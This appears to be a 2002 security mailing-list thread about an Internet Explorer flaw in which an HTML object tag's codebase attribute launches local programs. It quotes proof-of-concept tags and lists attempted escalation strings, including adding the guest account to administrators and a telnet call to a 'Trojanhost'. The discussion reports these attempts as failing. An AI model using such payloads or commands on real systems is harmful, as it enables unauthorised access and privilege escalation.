RE: IExplorer

["Chris Eidem" <jceidem () dexma com>]

steve,

change
"C:/windows/system32/net.exe send localhost Testing"

to
"C:/windows/system32/net.exe+send+localhost+Testing"

 - chris

> -----Original Message-----
> From: Steve [mailto:steve () frij com au]
> Sent: Wednesday, March 06, 2002 5:54 PM
> To: vuln-dev () securityfocus com; bugtraq () securityfocus com
> Subject: IExplorer
>
>
> I know we have seen many websites already showing this as a problem.
>
>
>    <object id="oFile" 
> classid="clsid:11111111-1111-1111-1111-111111111111"
> codebase="c:/winnt/system32/calc.exe"></object>
>    <object id="oFile" 
> classid="clsid:11111111-1111-1111-1111-111111111111"
> codebase="c:/windows/system32/calc.exe"></object>
>
> Of course, this is part of the HTML that is causing this 
> problem, but I was
> unable to reformat the string to cause any substantial 
> privilege escalation
> in the syste, via this bug.
>
> It could well be because I do not know much about Active-X, 
> so please do
> advice. I am ignorant but wanting to learn !
>
> Here are somethings I have tried with no results (Tested on 
> Windows XP)
> codebase= "strings to try below"
>
> "C:/windows/system32/net.exe send localhost Testing"
> "C:/windows/system32/net.exe localgroup administrators guest /add"
> "C:/windows/system32/iisreset.exe"
> "C:/windows/system32/telnet Trojanhost"
> "C:/windows/system32/cmd.exe /k net send localhost Testing"
> etc...
>
>
> I am not game enough to run "format c:/" of course, but 
> anyone tell me why
> these strings fail miserably ? Or maybe the bug isnt exactly 
> that easily
> exploitable ?
>
>
>
>
>
>
>
> Thomas Thornbury <thornt () optonline net> wrote:
>
> > This has got to be one of the scarier exploits in recent memory.
>
> Nah -- _far_ from it.
>
> Several people with a good record of finding truly bad holes in IE
> and related s/w have been banging away at this for some time now.
> First, to date no-one has found a way to use it for executing
> arbitrary code and there have been several other holes recently that
> do allow arbitrary code execution.  Second, no-one has even found a
> way to poke parameters to the programs that can be launched this
> way, which have to have a fully specified, local to the target
> program filename or pre-existing CLSID definition in the target
> machine's registry:
>
>    http://home.austin.rr.com/wiredgoddess/thepull/funRun.html
>
> I'd rate it "mildly interesting"...
>
> This does not mean MS should delay fixing it until some clever soul
> does work out how to achieve either or both the above, but it
> certainly makes it orders of magnitude less interesting and less
> worrying than some of the recent "auto-detach and run" Email
> attachments or MIME "inclusions" in web pages bugs.